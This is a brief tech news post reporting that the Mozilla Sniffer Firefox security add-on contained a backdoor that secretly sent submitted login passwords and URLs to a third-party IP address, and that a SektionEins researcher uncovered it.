Firefox security test add-on contains backdoor

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third-party.

Kinda ironic that a security add-on for Firefox contained a backdoor that leaked confidential information to an unknown third-party.

However, using the Mozilla Sniffer add-on would have introduced an unexpected vulnerability in any application being tested — whenever a login form was submitted, the add-on secretly sent a copy of the URL, password and other details to an IP address presumably controlled by the malicious author.

The backdoor was uncovered by Mozilla user Johann-Peter Hartmann of SektionEins who was using the add-on to test the security of a friend's online game.

This was a pretty serious issue. The Mozilla Sniffer add-on overwrote some of the original Tamper Data files, and added a new script that injected injects a new function which was called whenever a form is submitted by the browser. The function looked for any forms that have non-empty password fields and then uses two other functions to send the data to the third-party, presumably a fraudster.

Oooops.

Newsletters

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.
See All
See All